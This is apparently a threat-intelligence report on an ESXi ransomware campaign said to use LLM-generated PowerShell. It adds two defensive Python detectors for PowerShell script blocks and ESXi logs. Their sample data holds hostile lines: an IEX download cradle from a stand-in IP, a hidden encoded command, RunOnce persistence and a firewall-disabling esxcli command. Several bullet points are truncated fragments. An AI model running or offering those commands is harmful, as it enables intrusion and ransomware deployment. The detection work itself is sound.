Executive Summary: In April 2026, a novel fileless ransomware campaign emerged targeting VMware ESXi 8.0 environments. The attack leverages AI-generated PowerShell scripts to bypass traditional defenses, escalate privileges via CVE-2025-2085 (a disclosed but unpatched ESXi privilege escalation flaw), and encrypt datastores without dropping malicious executables. This marks a significant evolution in ransomware tactics, combining AI automation, living-off-the-land binaries (LOLBins), and VMware-specific exploitation. Early detection reveals a median dwell time of 4.2 hours, with full encryption achieved in under 30 minutes once access is secured.
- … (esxcli, vim-cmd) to enumerate and encrypt VMFS datastores.
- … vpxa agent configuration, ensuring persistence even after reboots.

The campaign is attributed to a rebranded affiliate of the Shadow Syndicate group, now operating under the moniker AI-Xploit. This cluster has rapidly adopted AI-driven tooling, with evidence of collaboration with underground LLM fine-tuning services. Its infrastructure includes compromised Azure AI training nodes used to generate attack scripts.
The attack begins with phishing emails carrying malicious ISO attachments. When the recipient opens one, Windows mounts it as a virtual drive; the decoy installer inside, once run, sideloads a PowerShell script. The script abuses a deserialization flaw in VMware's vSphere Client plugin (CVE-2025-3158, patched in March 2026 but still present on unpatched systems) to inject code into the vpxd service process, which gives the threat actor administrative access to the vCenter Server API.
Next, using PowerCLI, the attacker extracts SSH private keys from vCenter's credential store and uses them to authenticate to the ESXi hosts over SSH. Once in the ESXi shell, they exploit CVE-2025-2085, a race condition in the hostd service, to escalate from the limited vpxuser account to root.
The core ransomware payload is generated dynamically using a fine-tuned Mistral-7B model trained on offensive security research papers, red team reports, and leaked attack scripts. The LLM produces PowerShell code that:
- … Invoke-Expression (IEX) or Add-Type to compile C# inline.

The script avoids dropping an executable to disk: it keeps its configuration in environment variables and persists on the initial Windows foothold through the registry, via HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce. Note that the registry hive itself lives on disk, so "fileless" here means no standalone malicious file; the RunOnce value and, where Script Block Logging is enabled, the logged script text remain recoverable forensic artifacts.
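As an added example (not part of the original report and not the actor's tooling), the following Python triage script scans exported PowerShell script-block text (the ScriptBlockText field of event ID 4104) for the traits described above: IEX/Invoke-Expression, inline Add-Type compilation, configuration read from environment variables, RunOnce persistence, and -EncodedCommand wrappers, which it decodes (base64 over UTF-16LE) and rescans so that a trait hidden inside the encoding is still reported. The sample script blocks are constructed for illustration, and the indicator names are my own labels rather than vendor detection IDs.

```python
import base64
import re

# Constructed sample ScriptBlockText values, as exported from the
# Microsoft-Windows-PowerShell/Operational log (event ID 4104). The field
# name is real; the script contents are invented for illustration.
SAMPLE_SCRIPT_BLOCKS = [
    # benign administration
    "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }",
    # download cradle executed in memory
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')",
    # inline C# compiled with Add-Type, configuration read from the environment
    "Add-Type -TypeDefinition $src; [Loader]::Run($env:CFG)",
    # RunOnce persistence
    "Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce' -Name upd -Value $cmd",
    # the same IEX trait hidden behind -EncodedCommand (UTF-16LE, base64)
    "powershell.exe -NoP -W Hidden -EncodedCommand "
    + base64.b64encode("Invoke-Expression $env:PAYLOAD".encode("utf-16le")).decode(),
]

# Indicator names are my own labels, not vendor detection IDs.
INDICATORS = {
    "inline-invoke": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "inline-compile": re.compile(r"\badd-type\b.*-typedefinition", re.I),
    "download-cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "env-config": re.compile(r"\$env:", re.I),
    "runonce-persistence": re.compile(r"currentversion\\runonce", re.I),
}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_commands(text):
    """Return the plaintext of every -EncodedCommand argument found in text.

    PowerShell expects the blob to be base64 over UTF-16LE; anything that does
    not decode cleanly is skipped rather than guessed at.
    """
    decoded = []
    for blob in ENCODED_RE.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def scan_script_block(text, depth=0):
    """Return the sorted list of indicator names matched by one script block.

    Encoded commands are decoded and rescanned (bounded nesting), so a trait
    hidden inside -EncodedCommand is reported alongside "encoded-command".
    """
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    if depth < 3:
        for inner in decode_encoded_commands(text):
            hits.add("encoded-command")
            hits.update(scan_script_block(inner, depth + 1))
    return sorted(hits)


def triage(blocks):
    """(index, indicators) for every block that matched at least one indicator."""
    results = []
    for i, block in enumerate(blocks):
        hits = scan_script_block(block)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for i, hits in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {i}: {', '.join(hits)}")
```

Event 4104 splits long scripts into numbered fragments, so reassemble them by ScriptBlockId before scanning, otherwise a pattern that straddles a fragment boundary is missed. Any single indicator is noisy on an administrator's workstation; the combinations (a cradle plus IEX, or an encoded command that decodes to IEX with environment-variable configuration) are what separate this tradecraft from routine automation.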
The ransomware fingerprints ESXi 8.0 hosts with uname -r and queries VMFS metadata with vmkfstools --queryfs. It then suspends every virtual machine with vim-cmd vmsvc/power.suspend [vmid] (the VM IDs come from vim-cmd vmsvc/getallvms) and creates snapshots to preserve chain integrity. A rapid run of suspend commands against many VM IDs is the host-side signal that immediately precedes encryption.
Encryption is performed in-place on VMDK files using a custom VMFS-aware module. The ransomware:
- … vmkfstools --mount.
- … shred and sdelete-style patterns.

To survive reboots, the ransomware implants a web shell in the ESXi web UI (Host Client) using a zero-day in the ui/vSphereClient endpoint, which allows re-entry even after the original vulnerabilities are patched. It also disables VMware's Security Configuration Automation Toolkit (SCAT) and modifies the ESXi host firewall rules (the ruleset managed with esxcli network firewall) to block remote management tools.
Organizations running VMware ESXi 8.0 with unpatched vCenter or ESXi hosts are at critical risk. The median recovery time from such an attack exceeds 14 days, with total data loss in scenarios where backups are also compromised (e.g., via vCenter lateral movement). Financial losses average $4.7M per incident, including ransom demands (typically 12 BTC), downtime, and compliance fines (GDPR, HIPAA).
- … execution of esxcli, vim-cmd, or vmkfstools from non-privileged users or external IPs. On ESXi, interactive shell commands are recorded in /var/log/shell.log and SSH logins in /var/log/auth.log, so the two can be correlated by user and time.
- … changes to $PROFILE or HKLM\SOFTWARE\Microsoft\PowerShell.
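The following Python detector is an added example (not from the original report) that implements the host-side checks this page calls for: management-tool execution (esxcli, vim-cmd, vmkfstools) by users outside an allow list or after an SSH login from outside the management network, tampering with the ESXi firewall ruleset, and the mass VM-suspend burst that precedes encryption. The auth.log and shell.log lines are constructed; their layout only approximates the ESXi 8 format, and the allowed CIDR, allowed user set and burst thresholds are assumptions to be tuned per environment.

```python
import ipaddress
import re
from datetime import datetime, timedelta

# Constructed sample lines. The layout approximates ESXi 8 /var/log/auth.log
# and /var/log/shell.log (timestamp, level, process[pid]: message); the exact
# format is an assumption here, so adjust the regexes to your own hosts' logs.
AUTH_LOG = """\
2026-04-14T02:11:07Z In(38) sshd[2100431]: Accepted publickey for root from 10.20.0.5 port 50122 ssh2
2026-04-14T02:13:40Z In(38) sshd[2100512]: Accepted publickey for root from 203.0.113.44 port 41002 ssh2
""".splitlines()

SHELL_LOG = """\
2026-04-14T02:11:20Z In(14) shell[2100440]: [root]: esxcli system version get
2026-04-14T02:14:01Z In(14) shell[2100520]: [root]: vmkfstools -P /vmfs/volumes/datastore1
2026-04-14T02:14:05Z In(14) shell[2100520]: [root]: vim-cmd vmsvc/power.suspend 8
2026-04-14T02:14:08Z In(14) shell[2100520]: [root]: vim-cmd vmsvc/power.suspend 9
2026-04-14T02:14:11Z In(14) shell[2100520]: [root]: vim-cmd vmsvc/power.suspend 10
2026-04-14T02:14:14Z In(14) shell[2100520]: [root]: vim-cmd vmsvc/power.suspend 11
2026-04-14T02:14:30Z In(14) shell[2100520]: [root]: esxcli network firewall ruleset set -r sshServer -e false
2026-04-14T02:15:00Z In(14) shell[2100600]: [backupsvc]: vim-cmd vmsvc/getallvms
""".splitlines()

AUTH_RE = re.compile(
    r"^(?P<ts>\S+) .*sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<ip>\S+) port \d+")
SHELL_RE = re.compile(r"^(?P<ts>\S+) .*shell\[\d+\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.+)$")
MGMT_TOOL_RE = re.compile(r"^(?:esxcli|vim-cmd|vmkfstools)\b")
SUSPEND_RE = re.compile(r"^vim-cmd\s+vmsvc/power\.suspend\s+(\d+)")
FIREWALL_RE = re.compile(r"^esxcli\s+network\s+firewall\b")


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def parse_logins(lines):
    """Successful SSH logins as (timestamp, user, source ip), oldest first."""
    logins = []
    for line in lines:
        m = AUTH_RE.match(line)
        if m:
            logins.append((parse_ts(m["ts"]), m["user"], m["ip"]))
    return sorted(logins)


def parse_commands(lines):
    """Interactive shell commands as (timestamp, user, command), oldest first."""
    cmds = []
    for line in lines:
        m = SHELL_RE.match(line)
        if m:
            cmds.append((parse_ts(m["ts"]), m["user"], m["cmd"].strip()))
    return sorted(cmds)


def source_ip_for(ts, user, logins):
    """Source IP of the user's most recent SSH login at or before ts, or None.

    shell.log does not carry the SSH source, so the two logs are joined by
    user and time; None means no SSH login preceded the command (e.g. DCUI).
    """
    ip = None
    for login_ts, login_user, login_ip in logins:
        if login_user == user and login_ts <= ts:
            ip = login_ip
    return ip


def analyze(auth_lines, shell_lines, allowed_cidrs, allowed_users,
            burst_window=120, burst_min=3):
    """Return (reason, timestamp, user, detail) findings for the two logs."""
    nets = [ipaddress.ip_network(c) for c in allowed_cidrs]
    logins = parse_logins(auth_lines)
    findings, suspends = [], []
    for ts, user, cmd in parse_commands(shell_lines):
        if not MGMT_TOOL_RE.match(cmd):
            continue
        ip = source_ip_for(ts, user, logins)
        if user not in allowed_users:
            findings.append(("mgmt-tool-from-unexpected-user", ts, user, cmd))
        if ip is not None and not any(ipaddress.ip_address(ip) in n for n in nets):
            findings.append(("mgmt-tool-from-external-ip", ts, user, f"{cmd} (ssh from {ip})"))
        if FIREWALL_RE.match(cmd):
            findings.append(("firewall-tamper", ts, user, cmd))
        m = SUSPEND_RE.match(cmd)
        if m:
            suspends.append((ts, m.group(1)))
    # Many distinct VMs suspended inside a short window: the pre-encryption step.
    window = timedelta(seconds=burst_window)
    for i, (start, _) in enumerate(suspends):
        vmids = {vmid for t, vmid in suspends[i:] if t - start <= window}
        if len(vmids) >= burst_min:
            findings.append(("mass-vm-suspend", start, "-",
                             "vmids " + ",".join(sorted(vmids, key=int))))
            break
    return findings


if __name__ == "__main__":
    for reason, ts, user, detail in analyze(AUTH_LOG, SHELL_LOG, ["10.20.0.0/24"], {"root"}):
        print(f"{ts:%Y-%m-%dT%H:%M:%SZ} {reason:32} {user:10} {detail}")
```

Two caveats apply. shell.log only records the interactive ESXi Shell, so actions driven through the hostd API with the vpxuser credentials never appear there and need hostd.log or vCenter events instead. And an attacker who reaches root can edit or clear these files, so the check is only trustworthy against copies forwarded off-host by syslog before the intrusion.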